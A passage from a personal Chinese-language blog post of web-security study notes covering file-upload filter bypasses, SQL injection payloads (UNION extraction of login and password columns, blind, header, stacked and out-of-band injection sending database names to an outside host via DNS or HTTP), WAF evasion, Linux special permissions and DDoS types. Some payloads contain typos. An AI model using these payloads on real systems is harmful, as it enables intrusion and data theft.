jpg的意思是，jpg文件按照php文件的方式解析</p><p>大小写绕过</p><p>大小写用于Windows平台环境下，在Windows中，大小写是不敏感的，而在Linux环境下，大小写是敏感的</p><p>Windows文件流绕过</p><p>利用windows平台的NTFS文件系统的文件流特性，设置文件时，默认使用未命名的文件流，但是也可以创建其他命名的文件流</p><p>例如：</p><pre><code>echo hallo,word &gt; hallo.txt:a.txt
echo hallo &gt; hallo.txt
echo 666 &gt; hallo.txt::$data
</code></pre><p>第一个例子中，hallo,word并没有写入到hallo.txt，而是写入到了hallo.txt下的a.txt文件流中</p><p>第三个例子中，666写入到了hallo.txt默认文件流中</p><p>针对于白名单进行绕过</p><p>截断绕过（环境要求：php>5.3.42，magic_quotes_gpc关闭）</p><p>搭配burpsuite来拦截http请求</p><p>上传shell.php，通过拦截修改请求报文，修改为shell.php$00.jpg</p><p>$00在url中会解析为0，而在ASCII中0又表示为字符串结束，因此当url出现$00时，表示字符串读取结束</p><p>因此在上传shell.php$00.jpg时，对于先上传后检测的服务端来说，实质上传的是shell.php</p><hr><p>SQL注入</p><p>SQL注入漏洞是用户应用层与数据库层的安全漏洞</p><p>发生SQL注入的原因就是用户应用层提供的数据存在恶意SQL语句，当这些恶意SQL语句不被审查就执行的话是非常危险的，例如在一些输入框（比如搜索框）中提交一些恶意SQL语句，因为后端需要根据用户提供的数据来动态的构造SQL查询语句，而且这些动态参数存在恶意SQL语句时又没有进行过滤审查，将导致SQL注入漏洞触发</p><p>过程：通过数据库管理系统执行SQL命令，并且将数据库管理系统的执行结果返回给web服务器，web服务器再将结果进行整合成html网页，最后发送给客户端</p><p>GET型SQL注入漏洞是指使用GET请求方法进行URL链接拼接，来获取到超越权限的数据</p><p>GET型SQL注入漏洞</p><p>方法1：利用UNION操作符，并且通过SELECT 1,2,3,4,5来查找可以显示多少字段数据</p><p>UNION SELECT 1,user(),database(),table_name,version() FROM INFORMATION_SCHEMA.tables WHERE table_schema=database() &ndash;</p><p>查找INFORMATION_SCHEMA数据库的tables表的使用了当前数据库用户名，当前数据库名称，当前数据库版本，以及当前数据库的数据表，后面的&ndash;是sql注释，也可以使用#来注释掉后面的sql命令</p><p>当查找到的数据表存在敏感名称时，例如user时，可对敏感名称的表进行查找</p><p>UNION SELECT 1,columns,3,4,5 FROM INFORMATION_SCHEMA.columns WHERE table_name=&lsquo;user&rsquo; &ndash;</p><p>通过上面的命令查找user表的字段，当出现password，login等字段时，可以确定为后台的登录密码以及用户</p><p>UNION SELECT 1,password,login,4,5 FROM user &ndash;</p><p>通过上面的命令查找user表的password和login字段</p><p>注意：一般来说password字段返回的数据都是加密过的，而且绝大多加密算法都是不可逆的，只能通过彩虹表来碰撞</p><p>POST型SQL注入漏洞（主要通过http请求工具，因为post请求不是通过url发送的，http请求工具例如postman或者burpsuite，触发的方法和get型类似）</p><p>判断SQL注入点</p><p>能够与数据库进行交互，并且可以提交参数到网页时，那么可能存在sql注入</p><p>单引号判断法</p><p><a href="https://webtest.cjlio.com?id=1'">https://webtest.cjlio.com?id=1'</a></p><p>如果页面报错则存在SQL注入，因为sql会因为单引号个数不成对而导致sql执行错误而报错</p><p>判断注入的参数类型（如果参数可以输入非整型，则直接使用字符串型）</p><p>整型</p><p>SELECT * FROM test where id = and 1=1</p><p>字符串型</p><p>SELECT * FROM test where id = &lsquo;1&rsquo; and &lsquo;1&rsquo;=&lsquo;1&rsquo;</p><p>百分号判断法</p><p>针对于使用了LIKE关键字的</p><p><a href="https://webtest.cjlio.com?id=1$'">https://webtest.cjlio.com?id=1$'</a> and &lsquo;1&rsquo;=&lsquo;1&rsquo; &ndash;</p><p>简单的SQL注入防御方法：</p><p>减低错误信息的提供</p><p>使用mysql_escape_string($id)转义，将&rsquo;转义</p><p>过滤and，or，union，select等等关键词（黑名单）</p><p>SQL注入漏洞主要的类型：布尔型注入，可联合查询注入，基于时间延迟注入，报错型注入，可多语句查询注入</p><p>布尔型注入</p><p><a href="https://webtest.cjlio.com/?id=1'">https://webtest.cjlio.com/?id=1'</a> and substring(version) = 5&ndash;</p><p>布尔型注入被用于盲注，上面的例子中是通过布尔型注入来判断一下数据库版本是否为5，如果是的，那么将会是正常请求</p><p>联合查询注入（使用UNION关键字来拼接自己想要执行的SQL语句）</p><p>基于时间延迟注入（通过判断请求响应的时间来得到想要的信息，盲注，当页面不会提供报错信息时，布尔型注入也无效时采用）</p><p><a href="https://webtest.cjlio.com/?id=1'">https://webtest.cjlio.com/?id=1'</a> and slepp(5)&ndash;</p><p>slepp函数的作用是当sql语句执行完成后等待指定秒数再去返回执行结果，通过感觉时间来确定该语句是否正常执行</p><p>报错型注入（如果页面可以返回sql报错信息时使用，通过报错信息中获取数据）</p><p>多语句查询型注入（当页面可以执行多条SQL语句时）</p><p>例如：https://webtest.cjlio.com/?id=1; SELECT * FROM test where id =1&ndash;</p><p>多语句查询型注入可以使用时，很大可能UPDATA数据库更新或者删除数据库可以触发</p><p>HTTP头注入</p><p>利用http请求头，当web服务器需要从http请求头中获取信息到数据库中时（针对不进行过滤审查就直接进行数据库操作时）</p><p>通过http请求工具，例如postman或者burpsuite，修改请求头，重放攻击</p><p>User-Agent: abc&rsquo;, (SELECT database()) &ndash;</p><p>堆叠注入（多条sql命令一起执行）</p><p>使用;结束当前sql命令后继续执行下一条sql命令</p><p>联合注入和堆叠注入区别：联合注入只能进行查询操作（取决于sql命令的拼接头是查询还是更新还是删除，或者插入），而堆叠注入可以执行任意sql命令</p><p>一般实质环境中堆叠注入用不到（可以会出现权限问题），但是一用到就威力无穷</p><p>OOB注入（out of band，带外通道技术）</p><p>通过生成请求体来攻击，目标服务器接收到恶意的请求体后，进一步处理，处理的过程中目标服务器可能要向外部发送请求或者向外部获取资源，而这个外部实质是攻击者控制的服务器，在进行外部的请求时，将数据一起发送给攻击者控制的服务器，最后在攻击者控制的服务器查看数据（例如：通过dns记录来显示）</p><p><a href="https://test1.cjlio.com/?id=1'">https://test1.cjlio.com/?id=1'</a> and SELECT CONCAT(&rsquo;\\&rsquo;,(SELECT database(),&rsquo;.test2.cjlio.com&rsquo;);</p><p><a href="https://test1.cjlio.com/?id=1'">https://test1.cjlio.com/?id=1'</a> and SELECT LOAD_FILE(CONCAT(&rsquo;\\&rsquo;,(SELECT database(),&rsquo;.test2.cjlio.com&rsquo;));</p><p>最后在DNS记录中查看到想要的数据，上面的例子是获取当前的数据库名</p><p>利用HTTP协议来OOB注入</p><p><a href="https://test1.cjlio.com/?id=1'">https://test1.cjlio.com/?id=1'</a> and SELECT UTL_HTTP.REQUEST(<a href=https://test2.cjlio.com/test.php>https://test2.cjlio.com/test.php</a> &lsquo;||&rsquo;?id=&rsquo;||(SELECT database())) FROM dual;</p><p>上面的例子是通过https://test2.cjlio.com的test.php记录传递的数据，并且写入到test.txt中</p><p>混淆和绕过</p><p>一般的注入攻击会被WAF检测和过滤掉，而混淆和绕过就是针对WAF防御的手段</p><p>过滤词绕过</p><p>OR可使用||绕过，AND可使用&&绕过</p><p>union被过滤可使用||来绕过，例如：https://test1.cjlio.com/?id=1&rsquo; ||(SELECT user FROM usermain limit 1,1) = &lsquo;root&rsquo;</p><p>limit被过滤，可通过GROUP BY语句创建一个虚拟表，来绕过，例如：https://test1.cjlio.com/?id=1&rsquo; || SELECT min(user),id FROM usermain GROUP BY user HAVING user=&lsquo;root&rsquo;</p><p>GROUP BY被过滤，可通过SUBSTR()函数和GROUP_CONCAT()函数绕过，例如：https://test1.cjlio.com/?id=1&rsquo; || SELECT SUBSTR((SELECT GROUP_CONCAT(user)user FROM usermain),1,1)</p><p>SELECT和引号被过滤，可通过SUBSTR()函数绕过，例如：https://test1.cjlio.com/?id=1&rsquo; || SUBSTR(user,1,1=0x72)</p><p>空格被过滤，可通过/**/来替代空格来分开sql语句</p><p>等号被过滤，可通过like关键字绕过</p><p>双写绕过：例如union被过滤，可使用ununionion来替代，当ununionion被union被过滤机制处理后，将中间的union替代为空，导致左右两边合在了一起，从而达到绕过的目的、</p><p>双重编码绕过：当某个url编码的参数会被WAF编码过滤时，可对参数进行二次编码，让WAF解第一层编码，但是还有第二层编码，从而达到绕过的目的</p><p>编码注入（url编码）：%27表示&rsquo;，%23表示#，%df表示无意义，%5c表示\，%3d表示=，%2A表示*，例如：https://test1.cjlio.com/?id=1 %df SELECT %2A FROM test where id %3d 1 %23</p><p>二次注入：数据库存储的数据并不安全，不应该直接调用数据库的数据，例如admin&rsquo;#</p><hr><p>提权</p><p>Linux的特殊权限</p><p>SUID（Set UID）：除了rwx权限外的s权限，当某个普通用户具备运行具备SUID权限的文件时，那么当运行该文件，将会使用该文件所有者的身份去执行该文件，只要执行一结束，该身份将会消失</p><p>例如passwd命令，该命令具备SUID权限，当执行该命令时，将表示使用root身份来执行passwd命令，从而修改/usr/bin/passwd这个密码记录文件（该文件普通用户没有任何权限，当然权限只能限制普通用户，root用户是不会被限制的）</p><p>注意：SUID的特性，必须具备可执行权限，而且只对可执行文件有效，目录以及不可执行文件无效，提升权限的效果只在文件执行过程有效，执行结束则身份恢复，s权限必须在所有者权限上（也就是-rws&ndash;x&ndash;x）</p><p>SGID（Set GID）：当s权限出现在所属组中将变成SGID权限，如：-rwx&ndash;s&ndash;x，同样SGID只对可执行文件有效，而且其他用户具备可执行文件，一样只在执行过程中有效</p><p>该特殊权限的特性：在执行该具备SGID特殊权限的可执行文件时，当前用户的组身份将变成文件所属组的身份，赋予的是所属组的权限</p><p>注意：SGID对目录也是具备效果的，只不过当目录被赋予SGID权限后，不是执行触发，而且进入该目录就会触发特性，但是前提是该目录对于普通用户具备rwx权限，这样才能发挥SGID在目录的全部功能</p><p>SBIT（Stick BIT）：t权限，该特殊权限只对目录有效，当目录具备了SBIT特殊权限后，那么不管用户在该目录下创建的文件还是目录，都是只有该用户和root用户有权限修改和删除</p><p>该权限的表示为：drwxrwxrwt，哪怕其他用户具备该目录的全部权限</p><hr><p>DDOS攻击（分布式拒绝服务攻击）</p><p>原理：利用TCP/IP协议族的漏洞，来对目标服务器发送数据流，当超过服务器的处理能力或者服务器的带宽被饱和了，将导致服务器崩溃或者服务器网络崩溃，常见的DDOS攻击有：UDP泛洪攻击，DNS放大攻击，ICMP泛洪攻击，内存缓存放大攻击，SYN泛洪攻击，PING泛洪攻击，NTP放大攻击，ACK泛洪攻击，HTTP泛洪攻击（也就是CC攻击），Slowloris攻击，HTTP Post DDOS攻击等等</p><p>UDP泛洪攻击：利用UDP不需要建立连接就可以发送数据包的特性，大量发送UDP数据包给目标服务器的随机端口，当服务器接收到UDP数据包时，如果该端口没有应用在监听接收数据，会给发送方发送一个数据包，来表示目标端口不可用，当量大到一定程度时，服务器将无法对合法数据进行反应，从而达到拒绝服务的目的，对于会给发送方发送数据包，可进行伪造IP地址，不但不会作用到攻击机上，还做到了匿名</p><p>DNS放大攻击：利用DNS服务器，对DNS服务器发送DNS请求响应，但是该请求包被伪造成了目标服务器的IP，DNS服务器将会向目标服务器发送大量的数据包，从而造成网络阻塞，来达到拒绝服务的目的</p><p>ICMP泛洪攻击：通过不断发送ICMP ECHO REQUEST来对消耗目标服务器的处理器资源和带宽</p><p>攻击者控制的僵尸机对目标服务器发送ICMP ECHO REQUEST，目标服务器需要返回ICMP ECHO REPLY，常见的攻击手法有ping</p><p>内存缓存放大攻击：利用UDP的特性（不需要连接），当使用伪造IP对目标服务器发送http请求，目标服务器接收到请求后，发送响应到伪造的IP上，当目标服务器无法处理庞大的请求响应时，将会导致服务器崩溃和带宽饱满</p><p>放大攻击就是利用了请求包和响应包的体积差，发送小的请求包，需要返回大的响应包，从而达到放大攻击的效果</p><p>SYN泛洪攻击和ACK泛洪攻击都是利用TCP的三次握手的特性</p><p>SYN泛洪攻击：伪造IP向目标服务器发送SYN包，目标服务器接收到后返回ACK给伪造IP的机子，但是接收ACK的目标是不存在的，如果不对其进行确认ACK的话，目标服务器将该次连接挂起（半连接状态），目标服务器会重复发送ACK给伪造的IP上，当量大时，挂起的连接将会消耗掉目标服务器的资源，导致其崩溃，从而达到拒绝服务攻击的目的</p><p>ACK泛洪攻击：向目标服务器发送大量的ACK数据包，实质理论和SYN泛洪攻击类似</p><p>HTTP泛洪攻击：发送正常的请求，目标服务器需要返回响应，但是这个正常的请求是有针对性的，针对服务器需要消耗大量资源来做出响应的请求，例如搜索请求</p><p>Slowloris攻击：利用HTTP Request的特性，通过\r\n\r\n来表示HTTP请求发送已完成，当\r\n\r\n永远不发送时，目标服务器将会保持TCP连接，并且以一种极低速度来发送数据给目标服务器，让目标服务器认为HTTP Request还没有接收完成从而保持TCP连接，当量大时，目标服务器将被占满TCP连接，从而接收不到新的请求，最后达到拒绝服务攻击的目的</p><p>防御Slowloris攻击很简单，限制HTTP Request传输的最大时间，超时将中断连接，并且拉入黑名单</p><p>HTTP Post DDOS攻击：和Slowloris攻击类似，一样是慢速攻击，不过是通过指定一个大的content-length，但是发送包的速度很慢，来达到保持连接，消耗目标服务器的资源</p></div><footer class=post-footer><ul class=post-tags><li><a href=http://chenjunlinabc.github.io/tags/web%E5%AE%89%E5%85%A8/>web安全</a></li></ul><nav class=paginav><a class=prev href=http://chenjunlinabc.github.io/posts/pm2/><span class=title>« Prev</span><br><span>简单使用Pm2---node进程管理工具</span></a>
<a class=next href=http://chenjunlinabc.github.io/posts/144/><span class=title>Next »</span><br><span>简单了解a11y无障碍</span></a></nav></footer></article></main><footer class=footer><span>&copy; 2022 <a href=http://chenjunlinabc.github.io/>小陈的个人博客</a></span>
<span>Powered by
<a href=https://gohugo.io/ rel="noopener noreferrer" target=_blank>Hugo</a> &
        <a href=https://github.com/adityatelange/hugo-PaperMod/ rel=noopener target=_blank>PaperMod</a></span></footer><a href=#top aria-label="go to top" title="Go to Top (Alt + G)" class=top-link id=top-link accesskey=g><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentcolor"><path d="M12 6H0l6-6z"/></svg></a><script>let menu=document.getElementById("menu");menu&&(menu.scrollLeft=localStorage.getItem("menu-scroll-position"),menu.onscroll=function(){localStorage.setItem("menu-scroll-position",menu.scrollLeft)}),document.querySelectorAll('a[href^="#"]').forEach(e=>{e.addEventListener("click",function(e){e.preventDefault();var t=this.getAttribute("href").substr(1);window.matchMedia("(prefers-reduced-motion: reduce)").matches?document.querySelector(`[id='${decodeURIComponent(t)}']`).scrollIntoView():document.querySelector(`[id='${decodeURIComponent(t)}']`).scrollIntoView({behavior:"smooth"}),t==="top"?history.replaceState(null,null," "):history.pushState(null,null,`#${t}`)})})</script><script>var mybutton=document.getElementById("top-link");window.onscroll=function(){document.body.scrollTop>800||document.documentElement.scrollTop>800?(mybutton.style.visibility="visible",mybutton.style.opacity="1"):(mybutton.style.visibility="hidden",mybutton.style.opacity="0")}</script><script>document.getElementById("theme-toggle").addEventListener("click",()=>{document.body.className.includes("dark")?(document.body.classList.remove("dark"),localStorage.setItem("pref-theme","light")):(document.body.classList.add("dark"),localStorage.setItem("pref-theme","dark"))})</script><script>document.querySelectorAll("pre > code").forEach(e=>{const n=e.parentNode.parentNode,t=document.createElement("button");t.classList.add("copy-code"),t.innerHTML="copy";function s(){t.innerHTML="copied!",setTimeout(()=>{t.innerHTML="copy"},2e3)}t.addEventListener("click",t=>{if("clipboard"in navigator){navigator.clipboard.writeText(e.textContent),s();return}const n=document.createRange();n.selectNodeContents(e);const o=window.getSelection();o.removeAllRanges(),o.addRange(n);try{document.execCommand("copy"),s()}catch{}o.removeRange(n)}),n.classList.contains("highlight")?n.appendChild(t):n.parentNode.firstChild==n||(e.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName=="TABLE"?e.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(t):e.parentNode.appendChild(t))})</script></body></html>